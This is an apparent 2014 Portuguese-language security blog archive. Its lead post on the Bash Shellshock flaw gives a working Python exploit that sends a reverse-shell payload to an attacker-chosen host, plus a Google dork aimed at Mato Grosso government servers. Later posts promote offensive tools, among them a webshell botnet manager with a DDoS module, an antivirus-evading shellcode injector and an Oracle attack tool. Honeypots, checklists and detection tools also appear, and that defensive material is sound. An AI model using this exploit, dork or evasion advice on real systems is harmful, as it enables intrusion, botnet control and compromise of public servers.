quinta-feira, setembro 25, 2014

, ,

O Bash ShellShocker

O Bash ShellShocker (CVE-2014-6271) é uma vulnerabilidade no Bash, um interpretador de comandos ("shell") muito utilizado nos sistemas Unix. Ela explora a forma em que o bash processa as variáveis de ambiente, e pode ser acionada em qualquer situação em que um serviço executa um shell (o bash) direta ou indiretamente - tais como no sshd do OpenSSH, nos módulos mod_cgi e mod_cgid no servidor Apache, ou scripts executados por clientes DHCP. Por isso, esta vulnerabilidade pode ser explorada remotamente via HTTP, sem necessidade de se autenticar no site ou no servidor.

### GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution.

### Quem já confirmou?
External Source: CONFIRM
Name: https://bugzilla.redhat.com/show_bug.cgi?id=1141597
Type: Patch Information
Hyperlink: https://bugzilla.redhat.com/show_bug.cgi?id=1141597
External Source: CONFIRM
Name: https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/
Hyperlink: https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/

### Testando a Vulnerabilidade:
root@sefaz:~ # env x='() { :;}; echo vulneravel' sh -c "echo isso eh um teste"
vulneravel
isso eh um teste
se a mensagem em negrito acima aparecer, a versão do bash esta vulnerável.

### Atacando a aplicação: 
#
#CVE-2014-6271 cgi-bin reverse shell
#

import httplib,urllib,sys

if (len(sys.argv)<4):
 print "Usage: %s <host> <vulnerable CGI> <attackhost/IP>" % sys.argv[0]
 print "Example: %s localhost /cgi-bin/test.cgi 10.0.0.1/8080" % sys.argv[0]
 exit(0)

conn = httplib.HTTPConnection(sys.argv[1])
reverse_shell="() { ignored;};/bin/bash -i >& /dev/tcp/%s 0>&1" % sys.argv[3]

headers = {"Content-type": "application/x-www-form-urlencoded",
 "test":reverse_shell }
conn.request("GET",sys.argv[2],headers=headers)
res = conn.getresponse()
print res.status, res.reason
data = res.read()
print data

### Dork pesquisa google: inurl:cgi-bin/  ou filtrando mato grosso = inurl:cgi-bin site:.mt.gov.br :p
### POC Script: http://pastebin.com/kQ5ppEZD || https://github.com/rapid7/metasploit-framework/pull/3882
### patch de Correção:
http://ftp.gnu.org/pub/gnu/bash/bash-3.0-patches/bash30-017
http://ftp.gnu.org/pub/gnu/bash/bash-3.1-patches/bash31-018
http://ftp.gnu.org/pub/gnu/bash/bash-3.2-patches/bash32-052
http://ftp.gnu.org/pub/gnu/bash/bash-4.0-patches/bash40-039
http://ftp.gnu.org/pub/gnu/bash/bash-4.1-patches/bash41-012
http://ftp.gnu.org/pub/gnu/bash/bash-4.2-patches/bash42-048
http://ftp.gnu.org/pub/gnu/bash/bash-4.3-patches/bash43-025

More Fontes:
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271
http://anchisesbr.blogspot.com.br/2014/09/seguranca-bashpocalypse.html
http://www.pcworld.com/article/2687857/bigger-than-heartbleed-shellshock-flaw-leaves-os-x-linux-more-open-to-attack.html




Happy Hacking (-;

quinta-feira, agosto 14, 2014

Sandcat Browser 5 - A Penetration-Oriented Browser

Sandcat is a lightweight multi-tabbed web browser that combines the speed and power of Chromium and Lua. Sandcat comes with built-in live headers, an extensible user interface and command line console, resource viewer, and many other features that are useful for web developers and pen-testers.

Download: https://www.wuala.com/syhunt/tools

QuasiBot - Webshell Manager aka HTTP Botnet

QuasiBot is a complex webshell manager written in PHP, which operate on web-based backdoors implemented by user himself. Using prepared php backdoors, quasiBot will work as C&C trying to communicate with each backdoor. Tool goes beyond average web-shell managers, since it delivers useful functions for scanning, exploiting and so on. It is quasi-HTTP botnet, therefore it is called.
All data about bots is stored in SQL database, ATM only MySQL is supported. TOR proxy is also supported, the goal was to create secure connection between C&C and backdoors; using SOCKS5, it is able to torify all connections between you and web server. All configuration is stored in config file. QuasiBot it's still under construction so i am aware of any potential bugs.
You will need any web server software; tested on Linux, Apache 2.2 and PHP 5.4.4.
  
How it works?
  • quasiBot is operating on web-shells delivered by user, each backdoor is being verified by md5 hash which changes every hour
    quasiBot (C&C) -[request/verification]-> Bots (Webshells) -[response/verification]-> quasiBot (C&C) -[request/command]-> Bots (Webshells) -[response/execution]-> quasiBot (C&C)
  • Backdoors consists of two types, with and without DDoS module, source code is included and displayed in home page;
  • Connection between C&C and server is being supported by curl, TOR proxy is supported, User Agent is being randomized from an array
    quasiBot (C&C) -[PROXY/TOR]-> Bots (Webshells) <-[PROXY/TOR]- quasiBot (C&C)
  • Webshells can be removed and added at 'Settings' tab, they are stored in database
  • 'RSS' tab contain latest exploits and vulnerabilities feeds
  • 'RCE' tab allows to perform Remote Code Execution on specific server using selected PHP function
  • 'Scan' tab allows to resolve IP or URL and perform basic scan using nmap, dig and whois - useful in the phase of gathering information
  • 'Pwn' tab stands for few functions, which generally will help collect informations about server and try to find exploits for currently used OS version using Linux Exploit Suggestor
  • 'MySQL Manager', as the name says, can be used to perform basic operations on specific database - it could be helpful while looking for config files that include mysql connections on remote server; it also displays some informations about it's envoirment
  • 'Run' tab allows you to run specific command on every bots at once
  • 'DDoS' tab allows you to perform UDP DoS attacks using all bots or single one, expanded backdoor is required
  • Whole front-end is maintaned in a pleasant, functional interface

Running quasi for first time

  • Move all files to prepared directory, change default settings in config file (config.php)
  • Visiting quasiBot for the first time will create needed database and it's structure
  • In 'Settings' tab, you are able to add and delete shells, you're ready to go

Todo

  • Authorization system
  • Move Linux Exploit Suggestor to PHP language
  • Add Windows support to 'PWN' module
  • Automatic attacks on servers
  • Backdoors creation (backconnects)
  • Source code cleanup, it's still pretty shitty; amount of required files should be reduced
  • ???
 Download: https://github.com/Smaash/quasibot

HoneyDrive 3 - The Premier Honeypot Linux Distro



HoneyDrive is the premier honeypot Linux distro. It is a virtual appliance (OVA) with Xubuntu Desktop 12.04.4 LTS edition installed. It contains over 10 pre-installed and pre-configured honeypot software packages such as Kippo SSH honeypot, Dionaea and Amun malware honeypots, Honeyd low-interaction honeypot, Glastopf web honeypot and Wordpot, Conpot SCADA/ICS honeypot, Thug and PhoneyC honeyclients and more. Additionally it includes many useful pre-configured scripts and utilities to analyze, visualize and process the data it can capture, such as Kippo-Graph, Honeyd-Viz, DionaeaFR, an ELK stack and much more. Lastly, almost 90 well-known malware analysis, forensics and network monitoring related tools are also present in the distribution.

 FEATURES:
  • Virtual appliance based on Xubuntu 12.04.4 LTS Desktop.
  • Distributed as a single OVA file, ready to be imported.
  • Full LAMP stack installed (Apache 2, MySQL 5), plus tools such as phpMyAdmin.
  • Kippo SSH honeypot, plus Kippo-Graph, Kippo-Malware, Kippo2MySQL and other helpful scripts.
  • Dionaea malware honeypot, plus DionaeaFR and other helpful scripts.
  • Amun malware honeypot, plus helpful scripts.
  • Glastopf web honeypot, along with Wordpot WordPress honeypot.
  • Conpot SCADA/ICS honeypot.
  • Honeyd low-interaction honeypot, plus Honeyd2MySQL, Honeyd-Viz and other helpful scripts.
  • LaBrea sticky honeypot, Tiny Honeypot, IIS Emulator and INetSim.
  • Thug and PhoneyC honeyclients for client-side attacks analysis, along with Maltrieve malware collector.
  • ELK stack: ElasticSearch, Logstash, Kibana for log analysis and visualization.
  • A full suite of security, forensics and anti-malware tools for network monitoring, malicious shellcode and PDF analysis, such as ntop, p0f, EtherApe, nmap, DFF, Wireshark, Recon-ng, ClamAV, ettercap, MASTIFF, Automater, UPX, pdftk, Flasm, Yara, Viper, pdf-parser, Pyew, Radare2, dex2jar and more.
  • Firefox add-ons pre-installed, plus extra helpful software such as GParted, Terminator, Adminer, VYM, Xpdf and more.

HoneyDrive 3 RELEASE NOTES:

1) HoneyDrive 3 has been created entirely from scratch. It is based on Xubuntu Desktop 12.04.4 LTS edition and it is distributed as a standalone OVA file that can be easily imported as a virtual machine using virtualization software such as VirtualBox and VMware.
2) All the honeypot programs from the previous version of HoneyDrive are included, while they have also been upgraded to their latest versions and converted almost entirely to cloned git repos for easier maintenance and updating. This latter fact on its own could be considered reason enough to release the new version.
3) Many new honeypot programs have been installed that really make HoneyDrive 3 “complete” in terms of honeypot technology, plus around 50(!) new security related tools in the fields of malware analysis, forensics and network monitoring.
4) The main honeypot software packages and BruteForce Lab’s projects reside in /honeydrive. The rest of the programs reside in /opt. The location of all software can be found inside the README.txt file on the desktop.
5) HoneyDrive 3 doesn’t make itself as known to the outside world as the previous version. There are no descriptive messages and apart from Kippo-Graph and Honeyd-Viz every other piece of software is not accessible from the outside (unless if you configure them otherwise, or even lock down Kippo-Graph and Honeyd-Viz as well).
A note on versioning: previous versions of HoneyDrive started with a zero (0.1 and 0.2) which seemed confusing to some. I didn’t like it either and in the end I decided to “renumber” those as versions 1 and 2, essentially making this new version HoneyDrive 3, .i.e the third official release.

FREQUENTLY ASKED QUESTIONS:

  1. Why use HoneyDrive?
    HoneyDrive saves you time! It has all the major honeypot-related software pre-installed and pre-configured to work out of the box (or with some configuration options of your liking). As I have seen many times in comments or support requests I get, setting up a honeypot system is not always something easy. This is especially true for new infosec enthusiasts or sysadmins and “hard” to set up software like Dionaea for example.
  2. What utilities and software are included in HoneyDrive?
    HoneyDrive contains all the major honeypot-related software and a ton more useful tools. For a complete list you’ll have to take a look at the README.txt file included in the virtual appliance (you’ll find it on the desktop) or online at the downloads section of SourceForge (link above).
  3. Why isn’t [insert-name-here] included in HoneyDrive?
    Unfortunately I can’t keep track of every different piece of software. But, I’m very open to suggestions about HoneyDrive! If you know a tool that could be of benefit please let me know by leaving a comment on this page and it will be included in the next release of HoneyDrive.
  4. What is the password for [insert-name-here]?
    Again, your best bet is reading the README.txt file included in the virtual appliance or found online at the downloads section of SourceForge (link above). Every password you will need is included in its appropriate section.

CHAGELOG:

HoneyDrive 3
  • Upgraded ALL existing honeypot software to the corresponding latest versions.
  • Converted ALL existing honeypot software to cloned git repos for easier maintenance.
  • Removed distinguishable HoneyDrive artifacts and secured access to web tools.
  • Added Kippo-Malware and Kippo2ElasticSearch.
  • Added Conpot SCADA/ICS honeypot.
  • Added PhoneyC honeyclient.
  • Added maltrieve malware downloader.
  • Added the ELK stack (ElasticSearch, Logstash, Kibana).
  • Added the following security tools: dnstop, MINI DNS Server, dnschef, The Sleuth Kit + Autopsy, TekCollect, hashMonitor, corkscrew, cryptcat, socat, hexdiff, pdfid, disitool, exiftool, Radare2, chaosreader, netexpect, tcpslice, mitmproxy, mitmdump, Yara, Recon-ng, SET (Social-Engineer Toolkit), MASTIFF + MASTIFF2HTML, Viper, Minibis, Nebula, Burp Suite, xxxswf, extract_swf, Java Decompiler (JD-GUI), JSDetox, extractscripts, AnalyzePDF, peepdf, officeparser, DensityScout, YaraGenerator, IOCExtractor, sysdig, Bytehist, PackerID, RATDecoders, androwarn, passivedns, BPF Tools, SpiderFoot, hashdata, LORG.
  • Added the following extra software: 7zip, Sagasu.
  • Added the following Firefox add-ons: Disconnect, Undo Closed Tabs Button, PassiveRecon.
  • Removed the following software: Kojoney, mwcrawler, Vidalia, ircd-hybrid, DNS Query Tool, DNSpenTest, VLC, Parcellite, Open Penetration Testing Bookmarks Collection (Firefox).
 Download: http://bruteforce.gr/honeydrive
,

Shellter v1.7 - Dynamic ShellCode Injector Tool


















 Shellter is a dynamic shellcode injection tool, and probably the first dynamic PE infector ever created.It can be used in order to inject shellcode into native Windows applications (currently 32-bit apps only).The shellcode can be something yours or something generated through a framework, such as Metasploit.
Shellter takes advantage of the original structure of the PE file and doesn’t apply any modification such as changing memory access permissions in sections (unless the user wants and/or he chooses Basic Mode), adding an extra section with RWE access,and whatever would look dodgy under an AV scan.
Shellter uses a unique dynamic approach which is based on the execution flow of the target application.

How does it work?
Shellter uses a unique dynamic approach which is based on the execution flow of the target application. This means that no static/predefined locations are used for shellcode injection. Shellter will launch and trace the target, while at the same time will log the execution flow of the application.

What does it trace?
Shellter traces the entire execution flow that occurs in userland. That means,code inside the target application  itself (PE image), and code outside of it that might be in a system dll or on a heap, etc. This happens in order to ensure that functions actually belonging to the target executable, but are only used as callback functions for Windows APIs will not be missed.

However, the tracing engine will not log any instructions that are not in the memory range of the PE image of the target application, since these cannot be used as a reference to permanently inject the shellcode.

Why do I need Shellter?
Bypass AVs.
Executables created through Metasploit are most likely detected by most AV vendors. By using Shellter, you automatically have an infinitely polymorphic executable template, since you can use any 32-bit ‘standalone’ native Windows executable to host your shellcode. By ‘standalone’ means an executable that  doesn’t need any proprietary DLLs, apart from the system DLLs to load and run. For example, notepad.exe, and many other applications you can find online, or create by yourself as your own custom templates.

You can also use applications that make use of proprietary DLLs if those are not required to create the process in the first place, and are normally loaded later on if needed to execute code for a specific task. In case you select an application that needs one or more proprietary DLLs to create the process in the first place then you will have to include them in the same directory from where you load the main executable. However, this is not recommended since it is more convenient to have just a single executable to upload to the target.

What types of apps can I use?

You can basically use any 32-bit standalone (see above) native Windows application. Of course, since the main goal is to bypass an AV,you should always avoid packed applications or generally applications that have ‘dodgy’
characteristics such as sections with RWE permissions, more than one sections containing executable code etc..

Another reason why you should avoid packed applications is because advanced packers will also check for modifications of the file, so you will probably just break it. Advanced packers also perform various anti-reversing tricks which will detect Shellter’s debugging engine during tracing. If you are a lover of packers, you can first perform the injection and then pack the application with the packer of your choice.
The best bet is to use completely legitimate looking applications (ideally not packed) that are not flagged by any AV vendor for any reason.

These can be either yours, or something you got online.

Can I use encoded/self-decrypting payloads?
Shellter also supports encoded/self-decrypting payloads by taking advantage of  the Imports Table of the application. It will look for specific imported APIs that can be used on runtime to execute a self-decrypting payload without doing any modifications in the section’s characteristics from inside the PE Header.

At the moment 7 methods are supported for loading encoded payloads:

        VirtualAlloc
        VirtualAllocEx
        VirtualProtect
        VirtualProtectEx
        HeapCreate/HeapAlloc
        LoadLibrary/GetProcAddress
        CreateFileMapping/MapViewOfFile

If the target PE file doesn’t import by default the necessary API(s) then  a method wil be shown as ‘N/A’.
If a method requires more than one APIs, like for example method 4, it will also be shown as ‘N/A’ if the PE file doesn’t import all of them.If none of the encoded payload handler methods supported are available for the current PE target, you can choose to either select a non-encoded payload or to change the section’s characteristics from inside the PE Header. This last option has been added in order to provide more flexibility to the user in case he still wants to use a specific encoded payload along with the same PE file.

 Download: https://www.shellterproject.com/download/





domingo, julho 06, 2014

RTIR -A premiere Open Source incident handling system.


RTIR is the premiere Open Source incident handling system. We worked with over a dozen CERT and CSIRT teams to build a world-class incident handling system. RTIR helps you handle the ever-increasing volume incident reports. RTIR lets you tie multiple incident reports to specific incidents. RTIR makes it easy to launch investigations to work with law enforcement, network providers and other partners to get to the bottom of each incident and to track it through to a successful resolution.

It's easy to integrate RTIR into your existing systems and workflow. With open source code, a rich API and a vibrant community, RTIR can be tied into many external systems with only a few lines of configuration or a few minutes of programming. If you're using a publicly available product as part of your incident handling workflow, someone has probably already integrated it with RTIR


Download From:

HoneyBOT for Windows

Honeypoth Windows
HoneyBOT is a medium interaction honeypot for windows.
A honeypot creates a safe environment to capture and interact with unsolicited and often malicious traffic on a network. HoneyBOT is an easy to use solution ideal for network security research or as part of an early warning IDS.


Get the academic release
Free for academic users
Port Editor
Data Export
Email Alerts
Whitelist

Download Now
, ,

Application Security Checklists

Application Security Checklists

This checklist is a helpful reference when performing a web application security test. It is not a complete list though - there are often application-specific vulnerabilities and subtle issues that this does not cover.

Authentication
Logging in with an invalid user name does not reveal whether the user exists
Accounts are locked after a number of failed logins
An attacker cannot reset the lockout (e.g. by removing cookies)
Can't easily lockout an account to cause a denial of service
After login a redirect is issued, to prevent refresh attacks
Both "change password" and "logout" functions are provided
User is informed of last login time
Change password requires provision of old password
Passwords are proactively checked for strength
Password is never revealed (e.g. in the source of change password)

Session Management
Session tokens are at least 128-bit
Session tokens are unpredictable
A new session is allocated at login (i.e. session fixation is prevented)
Logout invalidates the session token on the server
Cookie has "secure" and "httponly" options set and is non-persistent
Sessions have an inactivity timeout
Sessions have an absolute timeout

Injection Attacks
Cross-site scripting
HTTP response splitting
SQL injection
LIKE pattern injection
LDAP injection
XPATH injection
Mail header injection
Directory traversal
Null-byte injection
Shell script / batch injection
Server-side script injection (PHP, Perl, etc.)
XML injection
Try to bypass filters using over-long utf-8 encodings
Try to bypass filters using wide-ASCII, or other Unicode equivalents

Content Checks
No script or CSS tags reference resources on other servers
No script or CSS tags on a page that can be accessed over HTTPS use URLs beginning http://
Use of eval, document.write, innerHTML, etc. does not cause XSS
Comments in files do not reveal sensitive information
Frames/iframes, if used, have frame spoofing protection
autocomplete=off is set on all forms asking for personal information
Private IP addresses

Server Side Script Behaviour
Arbitrary redirection
Arbitrary message inclusion
File upload features restrict uploaded content to prevent compromise
JavaScript Hijacking
Scripts that cause write actions require POST with a CSRF token
Scripts that act as an open proxy or mail relay
Exponential format accepted
Server compromise by uploading XML that sources a stylesheet
Source code disclosure through scripts that allow read access to files

Authorisation
All protected resources check for a valid session
All protected resources check for user permissions (forced browsing)
Parameter tampering does not allow access to others' data
Page-to-page flow is correctly enforced where required
Form POST targets perform the same authorisation as form views

Miscellaneous
cache-control: private or stronger is used on sensitive pages
All client-side validation is repeated on the server
Site supports HTTPS, and sensitive pages forbid HTTP access
All pages are displayed with status and address bars
All URLs are expected from a customer's point of view
No "Mixture of secure and insecure content" warnings

Server Configuration
There are no "orphaned" files (exist on the web server, but not linked)
No backup versions of files are accessible (may reveal source code)
No common insecure scripts (e.g. snoop servlet) are accessible
Error messages do not provide overly-detailed information

Special Cases
Dynamic login questions: question cannot be changed by the user
Application forms: restarting a transaction doesn't leak information
Smoke & mirrors: generated emails are appropriately protected
Domain auth: domain accounts cannot be locked out from the Internet
Forgotten password: understand any information leaked or risks created

SSL Client Certificates
Does login check user name matches certificate?
Can you lock out an account without holding the certificate?
Is certificate required for every request?
Does it check the certificate matches the session ID?
Can you login using a self-signed certificate?
Are test/pre-prod certificates separated from live?

Nested Web Service
Is the WSDL file accessible?
Does access to the web service require a web session?
Does it check the web session user matches the WS user?
Also, most of this checklist also applies to the web service.

Further, Very good article on Web Application Security Checklist:
http://www.enterpriseitplanet.com/security/features/article.php/2214631/Web-Application-Security-Checklist.htm

Various Security Checklists for your reference:
http://iase.disa.mil/stigs/checklist/
,

Patriot - NG ( Host IDS Windows )

 Segue uma ótima ferramenta para detecção de intrusão em Host na plataforma Windows. =)



Configuration:


Tray :

Patriot monitors:
  • New files in 'Startup' directories
  • Changes in Registry keys: Indicating whether any sensitive key (autorun, internet explorer settings...) is altered
  • New Users in the System
  • New Services installed
  • Changes in the hosts file
  • New scheduled jobs
  • Alteration of the integrity of Internet Explorer: (New BHOs, configuration changes, new toolbars)
  • Changes in ARP table (Prevention of MITM attacks)
  • Installation of new Drivers
  • New Netbios shares
  • TCP/IP Defense (New open ports, new connections made by processes, PortScan detection...)
  • Files in critical directories (New executables, new DLLs...)
  • New hidden windows (cmd.exe / Internet Explorer using OLE objects)
  • Netbios connections to the System
  • ARP Watch (New hosts in your network)
  • NIDS (Detect anomalous network traffic based on editable rules)

Submenu

,

SSL Eye ( prism Protection )


SSL Eye is a unique tool that detects SSL man in the middle spying, by comparing SSL fingerprints of single or multiple sites across many remote nodes that are owned and managed by EEDS located in different countries such as Singapore, USA, and Netherlands. In order to compare the results with your own fingerprint that comes through your local ISP. Additionally the tool will tell you if the site is using Extended Validation (EV) certificates or perfect forward secrecy as the key exchange mechanism such as DHE_RSA or ECDHE_RSA which is used by google. We have also implemented global shortcut keys on the application so that you can copy a site from the browser address bar and call it for instant scan to check if you are a victim of Man in The Middle Attack (MITM). 

Where the attacker listens to your communication channel in a public key exchange re-sends the keys on your behalf, substituting his own fake keys for the requested one, so that the two original parties (you and your bank) will still appear to be communicating with each other. (view screenshots 123). 

SSL Eye offers:

  • Retrieve fingerprint of any given ssl url from single or multiple sites with SNI support across EEDS nodes located in Netherlans, USA and Singapore.
  • Check if the site is using Extended Validation (EV) certificates.
  • Check if the site is implementing perfect forward secrecy on key exchange.
  • Export results into HTML report.
  • Sound alerts for invalid certificates.
  • Scan with global keys from clipboard without user interaction.

Product Name: SSL Eye
Usage: Freeware
Version: 1.5
Size: 5.42 MB
Updated on: 3.06.2014
Platform: Microsoft Windows
download_btn
 
,

StealthWalker - VPN tools

StealthWalker is a software-based VPN tool. It provides easy connectivity for the user and has a very straightforward mechanism to establish a VPN connection. StealthWalker creates an encrypted tunnel between your PC and the server, which means not only your browsing is secure, but also all communication going through the Internet, such as messengers, Skype, FTP, Email, etc. are all encrypted.

These features can be very useful in situations like:

  • Browsing Internet securely using public Access Points and WiFi hotspots.
  • Hiding your real identity online while using Forums, Blogs and Social networks.
  • Encrypting (AES-256) and hiding your Internet traffic from ISP or local network attackers.
What makes StealthWalker better if not unique:
  • Multiple layers of encryption including DNS encryption and protection against DNS leaks (What is a DNS leak?).
  • Fast VPN servers and bandwidth misuse monitor to avoid bottlenecks and overload issues.
  • Custom Tor (TOR Network) enabled built-in browser to offer multiple encryption layers, improved privacy and anonymity.
  • All-in-one built-in privacy solution offered by third-party open source tools such as Truecrypt, Keepass, Eraser, Processexplorer, Firefox, Dnscrypt, Tor, Autoruns, Desktops and Tcpview.
  • Custom control panel for Enterprise clients with advanced features such as user management and VPN server management.
  • Reliable and affordable high speed VPN services with variety of subscription plans.
  • Enhanced user’s guide (click here to view).
  • Enhanced user management system (click here to view).

FREE Account:

You can use StealthWalker for free with no limitations. However premium paid users will have faster servers with less users sharing the bandwidth. Due to abuse of our services we have limited free trial period to 3 day fully enjoy before you buy.

Premium Account:

After the successful free user registration through StealthWalker client you can place your desired plan order from the buy now button below. Once your order is approved your account will be instantly moved from free accounts group to the premium group.

Enterprise Edition:

We are glad to offer Enterprise Edition for corporates this includes dedicated VPN servers and additional features on the Web based Control Panel for easy management. Minimum order is 100 accounts package each account will cost you $2.8 only. Please Contact Us for more details.

Refund Policy:

Orders are eligible for a full refund only if a license/order key is not used within 30 days after the purchase date. We accept digital currency based on Bitcoins, Litecoins, and Feathercoins please Contact Us for more information.

Product Name: Stealth Walker
Usage: Commercial
Version: 2.5.3
Size: 71.3 MB
Updated on: 25.06.2014
Platform: Microsoft Windows

download_btn
, , ,

ODAT (Oracle Database Attacking Tool)

ODAT (Oracle Database Attacking Tool) is an open source penetration testing tool that test Oracle database security remotely.
Usage examples of ODAT:
  • You have an Oracle database listening remotely and want to find valid SIDs and credentials in order to connect to the database
  • You have a valid Oracle account on a database and want to escalate your privileges (ex: SYSDBA)
  • You have a valid Oracle account and want to execute commands on the operating system hosting this DB (ex: reverse shell)
ODAT (Oracle Database Attacking Tool)
Features
  • search valid SID on a remote Oracle Database listener via: a dictionary attack/a brute force attack/ALIAS of the listener
  • search Oracle accounts using: a dictionary attack/each Oracle user like the password
  • execute system commands on the database server using: DBMS_SCHEDULER/JAVA/external tables/oradbg
  • download files stored on the database server using: UTL_FILE/external tables/CTXSYS
  • upload files on the database server using: UTL_FILE/DBMS_XSLPROCESSOR/DBMS_ADVISOR
  • delete files using: UTL_FILE
  • send/reveive HTTP requests from the database server using: UTL_HTTP/HttpUriType
  • scan ports of the local server or a remote server using: UTL_HTTP/HttpUriType/UTL_TCP
  • exploit the CVE-2012-313 (http://cvedetails.com/cve/2012-3137)
Install/Dependencies
ODAT is compatible with Linux only. A standalone version exists in order to don’t have need to install dependencies and slqplus (see the build folder of the git). The ODAT standalone has been generated thanks to pyinstaller.
If you want to have the development version installed on your computer, these following tool and dependencies are needed:
  • Langage: Python 2.7
  • Oracle dependancies: Instant Oracle basic & Instant Oracle sdk
  • Python libraries: cx_Oracle with the following recommended – colorlog/termcolor/argcomplete/pyinstaller
You can download ODAT standalone here:
32-Bit – odat-linux-libc2.19-i686.tar.gz
64-Bit – odat-linux-libc2.19-x86_64.tar.gz
Or read more here.

,

NSA catalog 2014

 Boa Tarde H4x0r's =)


- Este documento é um catalogo de serviços que a NSA realiza confira!
[1] https://en.wikipedia.org/wiki/NSA_ANT_catalog
[2] https://www.eff.org/files/2014/01/06/20131230-appelbaum-nsa_ant_catalog.pdf
[3] http://www.nsaplayset.org/

Qual é o valor de Descobrir alguem na rede TOR ? 3mil dolares é a resposta!!!

Uma das conferências do Black Hat 2014, que acontece de 2 a 7 de agosto em Las Vegas, poderá ser decepcionante para os usuários da rede Tor: os pesquisadores de segurança Alexander Volynkin e Michael McCord vão apresentar os resultados de seus estudos sobre um método de tirar do anonimato os IPs em uso.O título da apresentação é “Você não precisa ser a NSA para quebrar o Tor: é barato tirar o anonimato dos usuários” e eles deverão mostrar que o custo para se fazer isso é da ordem de US$ 3 mil.

A descrição da palestra dos pesquisadores diz que em sua análise eles descobriram que um adversário persistente com alguns servidores poderosos e alguns links gigabit podem tirar do anonimato centenas de milhares de clientes Tor e milhares de serviços em alguns meses. O custo total do investimento? Pouco menos de US $ 3.000. Durante essa apresentação, eles cobrirão rapidamente a natureza, a viabilidade e as limitações de possíveis ataques, e, em seguida, mergulharão em dezenas de estudos de casos reais de sucesso de quebra de anonimato, que vão desde a tomada de centros de comando de botnets e a sites de comércio de drogas e de pedofilia.

A apresentação será concluída com as lições aprendidas e conclusões sobre o futuro da segurança das redes  distribuídas de anonimato.Veja no link o briefing da palestra: https://www.blackhat.com/us-14/briefings.html#you-dont-have-to-be-the-nsa-to-break-tor-deanonymizing-users-on-a-budget 

sexta-feira, julho 04, 2014

, ,

WhatsApp Key/DB Extractor | CRYPT7 | NON-ROOT

The purpose of this script is to provide a method for WhatsApp users to extract their cipher key on NON-ROOTED Android devices. The cipher key is required to decrypt WhatsApp CRYPT6 and CRYPT7 backup files. This script works by hooking into the USB backup feature on Android 4.0 or higher. It will NOT work with earlier Android versions or on devices where this feature has been deliberately disabled by the manufacturer.

The cipher key can be used with WhatCrypt, both on the Website(online decryption / exportation) and with the Android App (offline decryption / recryption). Other apps and websites may also support WhatsApp cipher keys. It should be noted that WhatsApp cipher keys can roll (update) periodically. If this happens then you will need to repeat the instructions contained within this file in order to extract the latest cipher key. This script will also extract the latest UNENCRYPTED WhatsApp Message Database (msgstore.db) and Contacts Database (wa.db).

In addition to the above. A copy of the cipher key will also be pushed to the WhatsApp Database directory on the device itself and contained within a file called ".nomedia". The reason for this is to allow Android Developers a unified method in which they can offer their app users WhatsApp Decryption for those willing to run this script.

PREREQUISITES:
  1. O/S: Windows Vista, Windows 7 or Windows 8
  2. Java - If not installed: Download Java
  3. ADB (Android Debug Bridge) Drivers - If not installed: ADB Installer
  4. USB Debugging* must be enabled on the target device. Settings -> Developer Options -> (Debugging) USB debugging
  5. Android device with Android 4.0 or higher
*= If you cannot find Developer Options then please go to: Settings -> About phone/device and tap the Build number multiple times until you're finally declared a developer.

INSTRUCTIONS:
  1. Extract "WhatsAppKeyExtract.zip" on your computer maintaining the directory structure.
  2. Browse to the extracted folder and click on "WhatsAppKeyExtract.bat".
  3. Connect your device via USB**, unlock your screen and wait for "Full backup" to appear.
  4. Leave the password field blank and tap on "Back up my data".
  5. The "extracted" folder will now contain your "whatsapp.key", "msgstore.db" and "wa.db".
** = If you have never used USB Debugging before, you may also need to verify the fingerprint.
CHANGELOG:

1.1 - Removed Java check, due to some users reporting that they're getting stuck in an install loop.
1.0 - Initial release.

GITHUB FORK / *NIX VARIANT:
Not my hub, but many thanks to Abinash Bishoyi who has created an unofficial fork on GitHub. He has added a *nix variant "sh" script and made some modifications for users who have experienced problems with ADB on Android 4.4.3. Kudos to him. 
Link: https://github.com/AbinashBishoyi/Wh...y-DB-Extractor

COMPATIBLE APPS:
  1. WhatCrypt Tool 1.3+
  2. WhatsApp Tri-Crypt 1.2+
The apps listed above have been confirmed working with WhatsApp Key/DB Extractor. I.E. They will either look for and use the static cipher key that this tool will copy to: "sdcard/WhatsApp/Databases/.nomedia" as an alternative decrypt/recrypt method, or will allow you to manually set the path to the key file. If you wish your app to be added to this list, then please let me know and I will add your app (pending verification / confirmation).

AUTHOR: TripCode
THANKS: dragomerlin for Android Backup Extractor, Snoop05 for ADB Installer and Abinash Bishoyi for GitHub fork.
ATTACHED THUMBNAILS
Click image for larger version Name: WhatsAppKeyDBExtractorSC.png Views: 1868 Size: 12.2 KB ID: 2782960  
ATTACHED FILES
File Type: zipWhatsAppKeyExtract.zip - [Click for QR Code] (3.75 MB, 2495 views)
Fonte: xda-developers.com
, ,

WhatCrypt - WhatsApp Database Crypt Tool

WhatCrypt is a decryption and recryption tool for backed up WhatsApp databases.


Usage Examples:
  1. Decrypt .crypt, .crypt5, .crypt6 or .crypt7 database files and turn them into SQLite files.
  2. Decrypt or Recrypt .crypt5, .crypt6 or .crypt7 database files that have not been linked to any account.
  3. Recrypt .crypt5, .crypt6 or .crypt7 database files so they can be used on another device / account.
  4. Recrypt .crypt5, .crypt6 or .crypt7 database files to .crypt so they can be used on older WhatsApp versions.
  5. Recrypt .crypt, .crypt5 or .crypt6 database files to .crypt7 so they can be used on newer WhatsApp versions.
All decrypted and recrypted files will be saved in the same directory as the original encrypted
file. Decrypted files will end in .db. Recrypted files will end in re.crypt, re.crypt5, re.crypt6 or re.crypt7. The
original encrypted files will not be moved or deleted. If you get any Decryption Failed messages
then it means that either the encrypted database is corrupt or you have supplied the incorrect
account name or key file. Root access will be required to obtain your crypt key (crypt 6 /7) or Android 4.0+.

Download Here: http://whatcrypt.com/com.whatcrypt.apk

Version History
Version 1.0 - Initial release.
Version 1.1 - Added disable minions (sounds) option.
Version 1.2 - Added support for empty or null accounts with crypt5.
Version 1.3 - Added support for crypt6.
Version 1.4 - Added root key copier.
Version 1.5 - Added support for crypt7.
Version 1.6 - Removed minions (sounds).
Version 1.7 - Added decrypt / recrypt progress bar.

 Fonte: xda-developers.com
, , , ,

